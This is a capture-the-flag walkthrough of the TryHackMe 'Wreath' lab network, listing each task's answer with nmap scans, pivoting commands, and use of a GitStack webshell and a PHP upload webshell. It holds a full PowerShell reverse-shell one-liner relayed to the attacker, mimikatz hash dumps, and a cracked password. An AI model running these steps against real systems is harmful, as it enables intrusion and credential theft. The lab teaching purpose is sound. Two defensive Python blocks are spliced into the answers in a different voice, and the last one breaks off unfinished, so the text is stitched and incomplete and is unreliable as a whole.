Wreath - [THM]

Marmeus


    Introduction

    In this post I have stored every single flag you need in order to complete the network room Wreath.

    If you want further detail about how to solve each task, I encourage you to watch DarkSec's playlist.

    Wreath infrastructure

    Task 5 - [Webserver] Enumeration

    How many of the first 15000 ports are open on the target?

    kali@kali:~/Documents/THM/Wreath$ sudo nmap -sS -n -T5 -oN first.txt 10.200.86.200
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-10 18:24 EDT
    Nmap scan report for 10.200.86.200
    Host is up (0.049s latency).
    Not shown: 995 filtered ports
    PORT      STATE  SERVICE
    22/tcp    open   ssh
    80/tcp    open   http
    443/tcp   open   https
    9090/tcp  closed zeus-admin
    10000/tcp open   snet-sensor-mgmt
    

    There are 4 ports.

    What OS does Nmap think is running?

    kali@kali:~/Documents/THM/Wreath$ sudo nmap -sC -sV -p22,80,443,10000,9090 -T5 -n -oN firstDepth.txt 10.200.86.200
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-10 18:25 EDT
    Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
    NSE Timing: About 99.63% done; ETC: 18:26 (0:00:00 remaining)
    Nmap scan report for 10.200.86.200
    Host is up (0.048s latency).
    
    PORT      STATE  SERVICE    VERSION
    22/tcp    open   ssh        OpenSSH 8.0 (protocol 2.0)
    | ssh-hostkey: 
    |   3072 9c:1b:d4:b4:05:4d:88:99:ce:09:1f:c1:15:6a:d4:7e (RSA)
    |   256 93:55:b4:d9:8b:70:ae:8e:95:0d:c2:b6:d2:03:89:a4 (ECDSA)
    |_  256 f0:61:5a:55:34:9b:b7:b8:3a:46:ca:7d:9f:dc:fa:12 (ED25519)
    80/tcp    open   http       Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
    |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1c
    |_http-title: Did not follow redirect to https://thomaswreath.thm
    443/tcp   open   ssl/http   Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1c
    |_http-title: Thomas Wreath | Developer
    | ssl-cert: Subject: commonName=thomaswreath.thm/organizationName=Thomas Wreath Development/stateOrProvinceName=East Riding Yorkshire/countryName=GB
    | Not valid before: 2021-04-10T16:32:29
    |_Not valid after:  2022-04-10T16:32:29
    |_ssl-date: TLS randomness does not represent time
    | tls-alpn: 
    |_  http/1.1
    9090/tcp  closed zeus-admin
    10000/tcp open   http       MiniServ 1.890 (Webmin httpd)
    |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 44.38 seconds
    

    As we can see from the Nmap results for ports 80 and 443, the OS is CentOS.

    Open the IP in your browser -- what site does the server try to redirect you to?

    https://thomaswreath.thm/

    Note: We need to add this host to the /etc/hosts file.

    Read through the text on the page. What is Thomas' mobile phone number?

    +447821548812

    Look back at your service scan results: what server version does Nmap detect as running here?

    MiniServ 1.890 (Webmin httpd)

    What is the CVE number for this exploit?

    Searching Google for "MiniServ 1.890 CVE" gives CVE-2019-15107.

    Task 6 - [Webserver] Exploitation

    Which user was the server running as? root

    What is the root user's password hash?

    The root hash is in /etc/shadow.

    $6$i9vT8tk3SoXXxK2P$HDIAwho9FOdd4QCecIJKwAwwh8Hwl.BdsbMOUAd3X/chSCvrmpfy.5lrLgnRVNq6/6g0PxK9VqSdy47/qKXad1

    What is the full path to this file? /root/.ssh/id_rsa

    Task 8 - [Pivoting] High-level Overview

    Which type of pivoting creates a channel through which information can be sent hidden inside another protocol?

    Tunnelling: Creating a proxy type connection through a compromised machine in order to route all desired traffic into the targeted network. This could potentially also be tunnelled inside another protocol (e.g. SSH tunnelling)

    Which Metasploit Framework Meterpreter command can be used to create a port forward? portfwd

    Task 9 - [Pivoting] Enumeration

    What is the absolute path to the file containing DNS entries on Linux?

    /etc/resolv.conf

    What is the absolute path to the hosts file on Windows?

    C:\Windows\System32\drivers\etc\hosts

    How could you see which IP addresses are active and allow ICMP echo requests on the 172.16.0.x/24 network using Bash?

    for i in {1..255}; do (ping -c 1 172.16.0.${i} | grep "bytes from" &); done

    Task 10 - [Pivoting] Proxychains & Foxyproxy

    What line would you put in your proxychains config file to redirect through a socks4 proxy on 127.0.0.1:4242?

    socks4 127.0.0.1:4242

    What command would you use to telnet through a proxy to 172.16.0.100:23?

    proxychains telnet 172.16.0.100 23

    Which tool is more apt for proxying to a webapp: Proxychains (PC) or FoxyProxy (FP)?

    "FP". FoxyProxy is very useful in combination with Burp.

    Task 11 - [Pivoting] SSH Tunnelling / Port Forwarding

    If you're connecting to an SSH server from your attacking machine to create a port forward, would this be a local (L) port forward or a remote (R) port forward?

    Local, because the listening port will be on our own machine.

    Which switch combination can be used to background an SSH port forward or tunnel?

    -fN. The -f switch backgrounds the shell immediately so that we get our own terminal back. The -N switch tells SSH that it doesn't need to execute any commands (only set up the connection).

    It's a good idea to enter our own password on the remote machine to set up a reverse proxy, Aye or Nay?

    Nay. You would be risking getting your own machine hacked.

    What command would you use to create a pair of throwaway SSH keys for a reverse connection?

    ssh-keygen

    If you wanted to set up a reverse portforward from port 22 of a remote machine (172.16.0.100) to port 2222 of your local machine (172.16.0.200), using a keyfile called id_rsa and backgrounding the shell, what command would you use? (Assume your username is "kali")

    ssh -R 2222:172.16.0.200:22 kali@172.16.0.100 -i id_rsa -fN

    What command would you use to set up a forward proxy on port 8000 to user@target.thm, backgrounding the shell?

    ssh -D 8000 user@target.thm -fN

    If you had SSH access to a server (172.16.0.50) with a webserver running internally on port 80 (i.e. only accessible to the server itself on 127.0.0.1:80), how would you forward it to port 8000 on your attacking machine? Assume the username is "user", and background the shell.

    ssh -L 8000:127.0.0.1:80 user@172.16.0.50 -fN

    Task 12 - [Pivoting] plink.exe

    What tool can be used to convert OpenSSH keys into PuTTY style keys?

    puttygen

    Task 13 - [Pivoting] Socat

    Which socat option allows you to reuse the same listening port for more than one connection?

    reuseaddr

    If your Attacking IP is 172.16.0.200, how would you relay a reverse shell to TCP port 443 on your Attacking Machine using a static copy of socat in the current directory? Use TCP port 8000 for the server listener, and do not background the process.

    ./socat tcp-l:8000 tcp:172.16.0.200:443

    What command would you use to forward TCP port 2222 on a compromised server, to 172.16.0.100:22, using a static copy of socat in the current directory, and backgrounding the process (easy method)?

    Task 14 - [Pivoting] Chisel

    Use port 4242 for the listener and do not background the process.

    ./chisel server -p 4242 --reverse

    What command would you use to connect back to this server with a SOCKS proxy from a compromised host, assuming your own IP is 172.16.0.200 and backgrounding the process?

    ./chisel client 172.16.0.200:4242 R:socks &

    How would you forward 172.16.0.100:3306 to your own port 33060 using a chisel remote port forward, assuming your own IP is 172.16.0.200 and the listening port is 1337? Background this process.

    ./chisel client 172.16.0.200:1337 R:33060:172.16.0.100:3306 &

    If you have a chisel server running on port 4444 of 172.16.0.5, how could you create a local portforward, opening port 8000 locally and linking to 172.16.0.10:80?

    ./chisel client 172.16.0.5:4444 8000:172.16.0.10:80

    Task 15 - [Pivoting] Sshuttle

    How would you use sshuttle to connect to 172.16.20.7, with a username of "pwned" and a subnet of 172.16.0.0/16?

    sshuttle -r pwned@172.16.20.7 172.16.0.0/16 &

    What switch (and argument) would you use to tell sshuttle to use a keyfile called "priv_key" located in the current directory?

    --ssh-cmd "ssh -i priv_key"

    You are trying to use sshuttle to connect to 172.16.0.100. You want to forward the 172.16.0.x/24 range of IP addresses, but you are getting a Broken Pipe error. What switch (and argument) could you use to fix this error?

    -x 172.16.0.100

    Task 17 - [Git Server] Enumeration

    Excluding the out of scope hosts, and the current host (.200), how many hosts were discovered active on the network?

    [root@prod-serv tmp]# sudo ./nmap-Marmeus -sn 10.200.86.200/24 -oN Network.txt
    
    Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2021-04-11 23:12 BST
    Cannot find nmap-payloads. UDP payloads are disabled.
    Nmap scan report for ip-10-200-86-1.eu-west-1.compute.internal (10.200.86.1)
    Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
    Host is up (-0.18s latency).
    MAC Address: 02:1B:CD:06:03:85 (Unknown)
    Nmap scan report for ip-10-200-86-100.eu-west-1.compute.internal (10.200.86.100)
    Host is up (0.00017s latency).
    MAC Address: 02:AD:75:A4:4E:FB (Unknown)
    Nmap scan report for ip-10-200-86-150.eu-west-1.compute.internal (10.200.86.150)
    Host is up (0.00045s latency).
    MAC Address: 02:36:9B:04:64:51 (Unknown)
    Nmap scan report for ip-10-200-86-250.eu-west-1.compute.internal (10.200.86.250)
    Host is up (0.00048s latency).
    MAC Address: 02:41:59:75:01:D5 (Unknown)
    Nmap scan report for ip-10-200-86-200.eu-west-1.compute.internal (10.200.86.200)
    Host is up.
    Nmap done: 256 IP addresses (5 hosts up) scanned in 4.83 seconds
    

    Excluding the server (.200) and the OpenVPN server (.250), there are 2 machines.

    In ascending order, what are the last octets of these host IPv4 addresses? (e.g. if the address was 172.16.0.80, submit the 80)

    100,150

    Scan the hosts -- which one does not return a status of "filtered" for every port (submit the last octet only)?

    [root@prod-serv tmp]# sudo ./nmap-Marmeus -sS 10.200.86.150 -T5 -oN 150.txt
    
    Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2021-04-11 23:17 BST
    Unable to find nmap-services!  Resorting to /etc/services
    Cannot find nmap-payloads. UDP payloads are disabled.
    Warning: 10.200.86.150 giving up on port because retransmission cap hit (2).
    Nmap scan report for ip-10-200-86-150.eu-west-1.compute.internal (10.200.86.150)
    Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
    Host is up (-0.023s latency).
    Not shown: 6147 filtered ports
    PORT     STATE SERVICE
    80/tcp   open  http
    3389/tcp open  ms-wbt-server
    5985/tcp open  wsman
    MAC Address: 02:36:9B:04:64:51 (Unknown)
    
    Nmap done: 1 IP address (1 host up) scanned in 17.48 seconds
    

    The IP that does return something is "150".

    Let's assume that the other host is inaccessible from our current position in the network. Which TCP ports (in ascending order, comma separated) below port 15000, are open on the remaining target?

    80,3389,5985

    We cannot currently perform a service detection scan on the target without first setting up a proxy, so for the time being, let's assume that the services Nmap has identified based on their port number are accurate. (Please feel free to experiment with other scan types through a proxy after completing the pivoting section). Assuming that the service guesses made by Nmap are accurate, which of the found services is more likely to contain an exploitable vulnerability?

    HTTP. Nowadays, most of the vulnerabilities discovered are in web services.

    Task 18 - [Git Server] Pivoting

    What is the name of the program running the service?

    First we need to use sshuttle in order to get access to the internal network.

    sshuttle -r root@10.200.86.200 --ssh-cmd "ssh -i FirstRoot.key" 10.200.86.200/24 -x 10.200.86.200

    Then, opening the web server in the browser returns an error page that reveals which folders are available.

    The program is GitStack.

    Do these default credentials work (Aye/Nay)?

    Accessing /registration/login/ shows a login form with default credentials, which do not work: Nay.

    You will see that there are three publicly available exploits. There is one Python RCE exploit for version 2.3.10 of the service. What is the EDB ID number of this exploit?

    kali@kali:~/Documents/THM/Wreath$ searchsploit gitstack  2.3.10
    -----------------------------------------------------------------------
     Exploit Title                                  |  Path
    -----------------------------------------------------------------------
    GitStack 2.3.10 - Remote Code Execution         | php/webapps/43777.py
    -----------------------------------------------------------------------
    Shellcodes: No Results
    

    The exploit id is 43777.

    Task 19 - [Git Server] Code Review

    Look at the information at the top of the script. On what date was this exploit written?

    kali@kali:~/Documents/THM/Wreath$ cat GitStackExploit.py
    # Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution
    # Date: 18.01.2018 
    

    Is the script written in Python2 or Python3?

    As we can see in the exploit, prints are used like this:

    print "[+] Get user list"

    Hence, it has been written in Python2.

    Just to confirm that you have been paying attention to the script: What is the name of the cookie set in the POST request made on line 74 (line 73 if you didn't add the shebang) of the exploit?

    r = requests.post("http://{}/rest/repository/".format(ip), cookies={'csrftoken' : csrf_token}, data={'name' : repository, 'csrfmiddlewaretoken' : csrf_token})

    The cookie name is "csrftoken".

    Task 20 - [Git Server] Exploitation

    First up, let's use some basic enumeration to get to grips with the webshell: What is the hostname for this target?

    kali@kali:~/Documents/THM/Wreath$ curl -X POST http://10.200.86.150/web/exploit.php -d "a=hostname"                                                              
    "git-serv"
    

    What operating system is this target?

    kali@kali:~/Documents/THM/Wreath$ curl -X POST http://10.200.86.150/web/exploit.php -d "a=systeminfo"
    "
    Host Name:                 GIT-SERV
    OS Name:                   Microsoft Windows Server 2019 Standard
    OS Version:                10.0.17763 N/A Build 17763
    OS Manufacturer:           Microsoft Corporation
    OS Configuration:          Standalone Server
    OS Build Type:             Multiprocessor Free
    Registered Owner:          Windows User
    Registered Organization:   
    Product ID:                00429-70000-00000-AA368
    Original Install Date:     08/11/2020, 13:19:49
    System Boot Time:          12/04/2021, 07:33:23
    System Manufacturer:       Xen
    System Model:              HVM domU
    System Type:               x64-based PC
    Processor(s):              1 Processor(s) Installed.
                               [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2400 Mhz
    BIOS Version:              Xen 4.2.amazon, 24/08/2006
    Windows Directory:         C:\Windows
    System Directory:          C:\Windows\system32
    Boot Device:               \Device\HarddiskVolume1
    System Locale:             en-gb;English (United Kingdom)
    Input Locale:              en-gb;English (United Kingdom)
    Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
    Total Physical Memory:     2,048 MB
    Available Physical Memory: 1,352 MB
    Virtual Memory: Max Size:  2,432 MB
    Virtual Memory: Available: 1,841 MB
    Virtual Memory: In Use:    591 MB
    Page File Location(s):     C:\pagefile.sys
    Domain:                    WORKGROUP
    Logon Server:              N/A
    Hotfix(s):                 5 Hotfix(s) Installed.
                               [01]: KB4580422
                               [02]: KB4512577
                               [03]: KB4580325
                               [04]: KB4587735
                               [05]: KB4592440
    Network Card(s):           1 NIC(s) Installed.
                               [01]: AWS PV Network Device
                                     Connection Name: Ethernet
                                     DHCP Enabled:    Yes
                                     DHCP Server:     10.200.86.1
                                     IP address(es)
                                     [01]: 10.200.86.150
                                     [02]: fe80::adcb:215a:130f:782c
    Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
    " 
    

    The operating system is Windows.

    What user is the server running as?

    kali@kali:~/Documents/THM/Wreath$ curl -X POST http://10.200.86.150/web/exploit.php -d "a=whoami"
    "nt authority\system" 
    

    The user is "nt authority\system".

    This will send three ICMP ping packets back to you. How many make it to the waiting listener?

    kali@kali:~/Documents/THM/Wreath$ curl -X POST http://10.200.86.150/web/exploit.php -d "a=ping -n 3 10.50.87.60"
    "
    Pinging 10.50.87.60 with 32 bytes of data:
    Request timed out.
    Request timed out.
    Request timed out.
    
    Ping statistics for 10.50.87.60:
        Packets: Sent = 3, Received = 0, Lost = 3 (100% loss),
    " 
    

    0 packets.

    Pick a method (cURL, BurpSuite, or any others) and get a shell!

    1. Create a firewall rule in order to open a port.

    [root@prod-serv tmp]# firewall-cmd --zone=public --add-port 44444/tcp
    success
    
    2. Upload socat to the CentOS machine.

    kali@kali:$ scp -i FirstRoot.key ./socat root@10.200.86.200:/tmp/socat-Marmeus

    3. Execute socat.

    [root@prod-serv tmp]# ./socat-Marmeus tcp-l:44444 tcp:10.50.87.60:4444

    4. Start a listener on the attacking machine.

    nc -nlvp 4444

    5. Create a reverse shell with PowerShell through the socat port.

    kali@kali:~/Documents/THM/Wreath$ curl -X POST http://10.200.86.150/web/exploit.php -d "a=powershell.exe%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient(%2710.200.86.200%27%2C44444)%3B%24stream%20%3D%20%24client.GetStream()%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile((%24i%20%3D%20%24stream.Read(%24bytes%2C%200%2C%20%24bytes.Length))%20-ne%200)%7B%3B%24data%20%3D%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString(%24bytes%2C0%2C%20%24i)%3B%24sendback%20%3D%20(iex%20%24data%202%3E%261%20%7C%20Out-String%20)%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20(pwd).Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20(%5Btext.encoding%5D%3A%3AASCII).GetBytes(%24sendback2)%3B%24stream.Write(%24sendbyte%2C0%2C%24sendbyte.Length)%3B%24stream.Flush()%7D%3B%24client.Close()%22"

    Task 21 - [Git Server] Stabilisation & Post Exploitation

    What is the Administrator password hash?

    mimikatz # lsadump::sam
    Domain : GIT-SERV
    SysKey : 0841f6354f4b96d21b99345d07b66571
    Local SID : S-1-5-21-3335744492-1614955177-2693036043
    
    SAMKey : f4a3c96f8149df966517ec3554632cf4
    
    RID  : 000001f4 (500)
    User : Administrator
      Hash NTLM: 37db630168e5f82aafa8461e05c6bbd1
    

    The Administrator hash is 37db630168e5f82aafa8461e05c6bbd1.

    What is the NTLM password hash for the user "Thomas"?

    RID  : 000003e9 (1001)
    User : Thomas
      Hash NTLM: 02d90eda8f6b6b06c32d5f207831101f
    

    The NTLM hash for Thomas is 02d90eda8f6b6b06c32d5f207831101f.

    What is Thomas' password?

    Using CrackStation, the password for Thomas is i<3ruby.

    Task 24 - [Command and Control] Empire: Overview

    Can we get an agent back from the git server directly (Aye/Nay)?

    Nay. It sits on another network, so we need to pivot.

    Task 27 - [Command and Control] Empire: Agents

    Using the help command for guidance: in Empire CLI, how would we run the whoami command inside an agent?

    shell whoami

    Task 32 - [Personal PC] Enumeration

    Scan the top 50 ports of the last IP address you found in Task 17. Which ports are open (lowest to highest, separated by commas)?

    Using the IP of the last machine as the target, the result is the following.

    *Evil-WinRM* PS C:\Users\Administrator\Documents> Invoke-Portscan -Hosts 10.200.86.100 -TopPorts 50
    
    
    Hostname      : 10.200.86.100
    alive         : True
    openPorts     : {80, 3389}
    closedPorts   : {}
    filteredPorts : {445, 79, 88, 2049...}
    finishTime    : 4/12/2021 1:48:00 PM
    

    The answer is "80,3389".

    Task 33 - [Personal PC] Pivoting

    Access the website in your web browser (using FoxyProxy if you used the recommended forward proxy, or directly if you used a port forward). Using the Wappalyzer browser extension (Firefox | Chrome) or an alternative method, identify the server-side Programming language (including the version number) used on the website.

    1. Upload and execute the chisel server.

    *Evil-WinRM* PS C:\Users\Administrator\Documents> netsh advfirewall firewall add rule name="Chisel-Marmeus" dir=in action=allow protocol=tcp localport=44444
    Ok.
    
    *Evil-WinRM* PS C:\Users\Administrator\Documents> upload tools/Pivoting/Windows/chisel_1.7.3_windows_amd64 C:\Windows\temp\chisel.exe
    Info: Uploading tools/Pivoting/Windows/chisel_1.7.3_windows_amd64 to C:\Windows\temp\chisel.exe
    
    Data: 11758248 bytes of 11758248 bytes copied
    
    Info: Upload successful!
    
    *Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Windows\temp
    *Evil-WinRM* PS C:\Windows\temp> .\chisel.exe server -p 44444 --socks5
    chisel.exe : 2021/04/12 14:05:02 server: Fingerprint tbkknW/xKYAT1z7WopX1/1pDK7koRWEKseg0zM65xZk=
        + CategoryInfo          : NotSpecified: (2021/04/12 14:0...WEKseg0zM65xZk=:String) [], RemoteException
        + FullyQualifiedErrorId : NativeCommandError
    2021/04/12 14:05:02 server: Listening on http://0.0.0.0:44444
    

    2. Execute the chisel client.

    kali@kali:~/Documents/THM/Wreath/tools/Pivoting/Windows$ chisel client 10.200.86.150:44444 44444:socks
    2021/04/12 09:08:00 client: Connecting to ws://10.200.86.100:44444
    2021/04/12 09:08:00 client: tun: proxy#127.0.0.1:4444=>socks: Listening
    

    3. Configure FoxyProxy.

    4. Access the web page.

    The Programming language and version is "PHP 7.4.11".

    Task 34 - [Personal PC] The Wonders of Git

    Use your WinRM access to look around the Git Server. What is the absolute path to the Website.git directory?

    C:\GitStack\repositories\Website.git

    Task 35 - [Personal PC] Website Code Analysis

    What does Thomas have to phone Mrs Walker about?

    kali@kali:/Website/2-345ac8b236064b431fa43f53d91c98c4834ef8f3$ vim ./resources/index.php
    [...]
        <!-- ToDo:
              - Finish the styling: it looks awful
              - Get Ruby more food. Greedy animal is going through it too fast
              - Upgrade the filter on this page. Can't rely on basic auth for everything
              - Phone Mrs Walker about the neighbourhood watch meetings
        -->
    [...]
    

    The answer is "neighbourhood watch meetings".

    Aside from the filter, what protection method is likely to be in place to prevent people from accessing this page?

    From the output of the previous question, the answer is "basic auth".

    Which extensions are accepted (comma separated, no spaces or quotes)?

    kali@kali:/Website/2-345ac8b236064b431fa43f53d91c98c4834ef8f3$ vim ./resources/index.php
    <?php
    
        if(isset($_POST["upload"]) && is_uploaded_file($_FILES["file"]["tmp_name"])){
            $target = "uploads/".basename($_FILES["file"]["name"]);
            $goodExts = ["jpg", "jpeg", "png", "gif"];
            if(file_exists($target)){
                header("location: ./?msg=Exists");
                die();
    [...]
    

    The accepted extensions are "jpg,jpeg,png,gif".
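    Task 39 below shows v2.jpg.php getting past this allowlist, so the filter evidently judges the name by an extension that is not the final one. The following is an added example, not the site's PHP: a Python reconstruction of that weak check (the exact original logic is an assumption) beside a hardened validator that looks only at the last extension, requires exactly one, verifies the image magic bytes, and lets the server pick the stored filename.

```python
import os
import secrets
from typing import Optional

# Allowlist taken from the $goodExts array in the page's index.php.
GOOD_EXTS = {"jpg", "jpeg", "png", "gif"}

# Leading bytes for each allowed image type (constructed lookup table).
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def weak_is_allowed(filename: str) -> bool:
    """Assumed reconstruction of the filter's behaviour, not the site's code:
    only the component after the FIRST dot is compared with the allowlist,
    so 'v2.jpg.php' passes because that component is 'jpg'."""
    parts = filename.split(".")
    return len(parts) > 1 and parts[1].lower() in GOOD_EXTS


def hardened_is_allowed(filename: str, content: bytes) -> bool:
    """Accept only if the name has exactly one extension, that extension is
    allowlisted (case-insensitive) and the file's leading bytes match the
    image type it claims. Requiring a single extension also rejects names
    such as 'shell.php.jpg', which an Apache AddHandler rule can still
    hand to the PHP interpreter."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        return False
    ext = parts[1].lower()
    if ext not in GOOD_EXTS:
        return False
    return content.startswith(MAGIC[ext])


def safe_target_name(filename: str, content: bytes) -> Optional[str]:
    """Storage name chosen by the server (random stem + validated extension),
    or None when the upload must be rejected. The client-supplied name is
    never reused, so it cannot steer the file to a different handler."""
    if not hardened_is_allowed(filename, content):
        return None
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed sample: a file named like the one used in Task 39,
    # carrying a JPEG header.
    sample = ("v2.jpg.php", b"\xff\xd8\xff\xe0JFIF")
    print("weak check   :", weak_is_allowed(sample[0]))
    print("hardened     :", hardened_is_allowed(*sample))
    print("stored name  :", safe_target_name("v2.jpg", sample[1]))
```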

    Task 37 - [AV Evasion] Introduction

    Which category of evasion covers uploading a file to the storage on the target before executing it?

    On-Disk evasion

    What does AMSI stand for?

    Anti-Malware Scan Interface

    Which category of evasion does AMSI affect?

    In-Memory evasion

    Task 38 - [AV Evasion] AV Detection Methods

    What other name can be used for Dynamic/Heuristic detection methods?

    Behavioural

    If AV software splits a program into small chunks and hashes them, checking the results against a database, is this a static or dynamic analysis method?

    Static

    When dynamically analysing a suspicious file using a line-by-line analysis of the program, what would antivirus software check against to see if the behaviour is malicious?

    Pre-defined rules

    What could be added to a file to ensure that only a user can open it (preventing AV from executing the payload)?

    Password

    Task 39 - [AV Evasion] PHP Payload Obfuscation

    What is the Host Name of the target?

    Once the new image has been uploaded, we access the following URL to obtain the operating system information.

    http://10.200.86.100/resources/uploads/v2.jpg.php?wreath=systeminfo

    Host Name:                 WREATH-PC
    OS Name:                   Microsoft Windows Server 2019 Standard
    OS Version:                10.0.17763 N/A Build 17763
    OS Manufacturer:           Microsoft Corporation
    OS Configuration:          Standalone Server
    OS Build Type:             Multiprocessor Free
    Registered Owner:          Windows User
    Registered Organization:   
    Product ID:                00429-70000-00000-AA411
    Original Install Date:     08/11/2020, 14:55:50
    System Boot Time:          12/04/2021, 14:51:58
    System Manufacturer:       Xen
    System Model:              HVM domU
    System Type:               x64-based PC
    Processor(s):              1 Processor(s) Installed.
                               [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2394 Mhz
    BIOS Version:              Xen 4.2.amazon, 24/08/2006
    Windows Directory:         C:\Windows
    System Directory:          C:\Windows\system32
    Boot Device:               \Device\HarddiskVolume1
    System Locale:             en-gb;English (United Kingdom)
    Input Locale:              en-gb;English (United Kingdom)
    Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
    Total Physical Memory:     2,048 MB
    Available Physical Memory: 1,369 MB
    Virtual Memory: Max Size:  2,432 MB
    Virtual Memory: Available: 1,815 MB
    Virtual Memory: In Use:    617 MB
    Page File Location(s):     C:\pagefile.sys
    Domain:                    WORKGROUP
    Logon Server:              N/A
    Hotfix(s):                 5 Hotfix(s) Installed.
                               [01]: KB4580422
                               [02]: KB4512577
                               [03]: KB4580325
                               [04]: KB4587735
                               [05]: KB4592440
    Network Card(s):           1 NIC(s) Installed.
                               [01]: AWS PV Network Device
                                     Connection Name: Ethernet
                                     DHCP Enabled:    Yes
                                     DHCP Server:     10.200.86.1
                                     IP address(es)
                                     [01]: 10.200.86.100
                                     [02]: fe80::b1e7:ce3b:c3c4:a547
    Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
    

    The Host Name is "WREATH-PC".

    What is our current username (include the domain in this)?

    With the following URL we can retrieve the username.

    http://10.200.86.100/resources/uploads/v2.jpg.php?wreath=whoami

    wreath-pc\thomas

    Task 40 - [AV Evasion Compiling] Netcat & Reverse Shell!

    What output do you get when running the command: certutil.exe?

    We can retrieve the output by running certutil.exe through our PHP RCE at http://10.200.86.100/resources/uploads/v2.jpg.php?wreath=certutil.exe, which returns: CertUtil: -dump command completed successfully.

    Task 41 - [AV Evasion] Enumeration

    [Research] One of the privileges on this list is very famous for being used in the PrintSpoofer and Potato series of privilege escalation exploits -- which privilege is this?

    PS C:\xampp\htdocs\resources\uploads> whoami /priv
    whoami /priv
    
    PRIVILEGES INFORMATION
    ----------------------
    
    Privilege Name                Description                               State   
    ============================= ========================================= ========
    SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
    SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
    SeCreateGlobalPrivilege       Create global objects                     Enabled 
    SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
    

    Among all of these privileges, the one used by the Potato exploits is "SeImpersonatePrivilege".

    There should be a bunch of results returned here. Read through them, paying particular attention to the PathName column. Notice that one of the paths does not have quotation marks around it. What is the Name (second column from the left) of this service?

    PS C:\xampp\htdocs\resources\uploads> wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"
    [...]
    System Explorer Service   SystemExplorerHelpService C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe  Auto 
    [...]
    

    The Name is "SystemExplorerHelpService".

    Is the service running as the local system account (Aye/Nay)?

    C:\xampp\htdocs\resources\uploads>sc qc SystemExplorerHelpService
    sc qc SystemExplorerHelpService
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: SystemExplorerHelpService
            TYPE               : 20  WIN32_SHARE_PROCESS 
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 0   IGNORE
            BINARY_PATH_NAME   : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
            LOAD_ORDER_GROUP   : 
            TAG                : 0
            DISPLAY_NAME       : System Explorer Service
            DEPENDENCIES       : 
            SERVICE_START_NAME : LocalSystem
    

    Looking at "SERVICE_START_NAME" we can see that it runs as LocalSystem: Aye.
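    An audit routine for the check the two questions above perform by eye, as an added example that is not part of the room or this post: it parses the padded column layout of the wmic command shown earlier, flags services whose unquoted binary path contains spaces, lists the path prefixes the service control manager would try before the real binary (the directories whose write ACLs must be verified), and produces the quoted PathName that closes the finding. Only the System Explorer row comes from the page; the other two rows are constructed.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample in the layout produced by
#   wmic service get name,displayname,pathname,startmode
# (wmic emits the columns alphabetically and pads them with spaces).
SAMPLE_WMIC_OUTPUT = r"""DisplayName              Name                       PathName                                                                                      StartMode
System Explorer Service  SystemExplorerHelpService  C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe  Auto
Apache2.4                Apache2.4                  "C:\xampp\apache\bin\httpd.exe" -k runservice                                                 Auto
Windows Update           wuauserv                   C:\Windows\system32\svchost.exe -k netsvcs -p                                                 Manual
"""


@dataclass
class Service:
    display_name: str
    name: str
    path_name: str
    start_mode: str


def parse_wmic(output: str) -> List[Service]:
    """Parse the padded wmic table; columns are separated by 2+ spaces."""
    rows = []
    for line in output.splitlines()[1:]:  # skip the header row
        if not line.strip():
            continue
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) != 4:
            raise ValueError(f"unexpected wmic row: {line!r}")
        rows.append(Service(*cols))
    return rows


def executable_path(path_name: str) -> str:
    """Drop service arguments: the binary ends at the first '.exe'."""
    m = re.search(r"\.exe", path_name, re.IGNORECASE)
    return path_name[: m.end()] if m else path_name


def is_unquoted_with_spaces(path_name: str) -> bool:
    """True when the path is not wrapped in quotes and the executable
    portion contains a space, i.e. the condition the question describes."""
    p = path_name.strip()
    if p.startswith('"'):
        return False
    return " " in executable_path(p)


def search_candidates(exe_path: str) -> List[str]:
    """Locations CreateProcess would try before the real binary: every
    space-delimited prefix with '.exe' appended. An audit must confirm
    that none of these parent directories is writable by normal users."""
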